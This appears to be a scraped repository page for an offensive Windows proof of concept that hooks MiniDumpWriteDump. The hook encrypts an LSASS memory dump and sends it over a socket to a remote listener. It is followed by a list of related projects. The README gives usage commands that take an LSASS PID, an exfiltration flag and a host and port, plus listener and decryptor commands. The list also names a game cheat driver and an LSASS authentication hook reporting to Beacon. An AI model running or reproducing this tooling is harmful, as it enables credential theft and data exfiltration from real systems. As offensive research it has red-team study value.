MiniDumpWriteDump behavior modification hook

Overview

MiniDumpWriteDumpPoC

MiniDumpWriteDump behavior modification hook

Read the full article in our blog: Adepts Of 0xCC: Hooks On Hoot Off

This is a function hook that allows to access the buffer generated by MiniDumpWriteDump before it gets to disk.

Once accessed, it will encrypt the buffer and send it through a socket to a given host.

Compilation

A full VS solution is provided. Just compile it.

Usage

First, set up the server to listen on the receiving host:

python3 serv.py <PORT>

    python3 serv.py 1234
.\minidumppoc.exe <LSASS_PID> <WRITE_TO_FILE 0|1> <EXFIL 0|1> [<HOST> <PORT>] [<EXPORT_PATH>]

    minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp"

Once the whole file is received, close the server, and use the dummy decryptor:

python3 dec.py woot.dmp woot_decrypted.dmp 0xb0
Owner
Adepts of 0xCC
Adepts of 0xCC
android analysis tools, jni trace by native hook, libc hook, write log with caller's addr in file or AndroidLog

编译方法 unix like mkdir "build" cd build cmake .. -DNDK=your_ndk_path/Android/sdk/ndk/22.0.7026061 -DANDROID_ABI=armeabi-v7a make -j8 或者使用andriod studio编

pony 49 May 18, 2022
collection of C/C++ programs that try to get compilers to exploit undefined behavior

------------------------------------------------------------------------------- UB Canaries: A collection of C/C++ programs that detect undefined beh

John Regehr 160 Jun 27, 2022
GlueGD is a mod loader for Geometry Dash that does not require a modification to any existing Geometry Dash files or an external injector or launcher.

GlueGD is a mod loader for Geometry Dash that does not require a modification to any existing Geometry Dash files or an external injector or la

Aly Cerruti 9 Apr 10, 2022
Tomb Raider III multiplayer modification.

Tomb Raider III Multiplayer Mod. Multiplayer Modification for Tomb Raider III. Website: https://tr3mp.net/ If you own the base source of \patch projec

Tony 3 Dec 25, 2021
Project is to port original Zmodem for Unix to CP/M and provide binaries and source code for platform specific modification as needed. Based on 1986 C source code by Chuck Forsberg

Zmodem-CP-M This repository is intended to foster a RetroBrewComputers community effort to port the original Zmodem source code for Unix to CP/M so ev

null 10 Apr 7, 2022
Project is to port original Zmodem for Unix to CP/M and provide binaries and source code for platform specific modification as needed. Based on 1986 C source code by Chuck Forsberg

Zmodem4CPM This repository is intended to foster a RetroBrewComputers community effort to port the original Zmodem source code for Unix to CP/M so eve

null 10 Apr 7, 2022
An easy to decode base64 modification.

crzy64 An easy to decode base64 modification. This is a base64 modification designed to simplify the decoding step. For the four encoded bytes, it onl

Ilya Kurdyukov 36 Jun 20, 2022
External warzone cheat with manual mapped driver (function hook), overlay (nvidia hijack), simple esp, no recoil

external_warzone_cheat External warzone cheat with manual mapped driver (function hook), overlay (nvidia hijack), simple esp, no recoil Offsests are N

NMan 79 Jun 18, 2022
Easily hook WIN32 x64 functions

About Library for easy hooking of arbitrary functions in WIN32 x64 executables. Only requires target function address. Disassembles the function prolo

tcpie 17 Jun 12, 2022
A crappy hook on SpAcceptLsaModeContext that prints incoming auth attempts. WIP

About Hooks for intercepting SpAcceptLsaModeContext to print any incoming authentication attempts to Beacon. The hook is installed on the Lsass heap t

Austin Hudson 0 Dec 11, 2021
🎮 Plants vs. Zombies multiplayer battle, developed via reverse engineering, inline hook and dynamic-link library injection. Two online players defend and attack as the plant side and zombie side respectively.

Plants vs. Zombies Online Battle This project has two original repositories: https://github.com/czs108/Plants-vs.-Zombies-Online-Battle https://github

Liugw 71 Oct 14, 2021
codeless Android hook (experimental)

AppInspect Download app-inspect-v0.0.1.zip AppInspect-0.0.1.apk Install: install Riru module adb push app-inspect-v0.0.1.zip /data/local/tmp adb shel

null 54 Jun 21, 2022
A demo of the relevant blog post: Hook Heaps and Live Free

LockdExeDemo A demo of the relevant blog post: Hook Heaps and Live Free DEMO Explanation There are 2 compile types. The first is an EXE. The EXE requi

null 141 Jun 22, 2022
Hook up the OnePlus6(T) tri-state key in PostmarketOS!

OnePlus 6(T) tri-state key support in PostmarketOS As the name suggest, the goal of this little project is to hook up the OnePlus6(T) tri-state key in

Michele Perrone 7 Nov 14, 2021
An efficient and versatile system call hook mechanism

Zpoline: hooking system calls without pain Zpoline is a novel system call hook mechanism that offers the following advantages. 100 times faster than p

null 88 May 26, 2022
Simple native jvm class dumper written in C by hook ClassLoader

JVM Native Class Dumper Simple native jvm class dumper written in C by hook ClassLoader What is used for? This tool allows you to dump all java classe

null 15 Jun 15, 2022
BokutachiHook - Hook for Lunatic Rave 2 to parse score data and send it to an HTTP server, made specifically for Bokutachi IR.

BokutachiHook Hook for Lunatic Rave 2 to parse score data and send it to an HTTP server, made specifically for Bokutachi IR (https://bokutachi.xyz). T

null 5 May 16, 2022
Malloc geiger is a hook for malloc that plays geiger counter blips in proportion to the amount of calls to malloc as a way of knowing what an application does

Malloc Geiger Malloc geiger is a hook for malloc that plays geiger counter blips in proportion to the amount of calls to malloc as a way of knowing wh

David Larsson 319 Jun 23, 2022
Single-header VMT hook class using vfptr swap method

Single-header C++ VMT hooking (vfptr swap) Supports RAII Unit tested with Catch2 Tested on x86/x64, MSVC and Clang/LLVM VMT size calculation Windows-o

shavit 4 Mar 22, 2022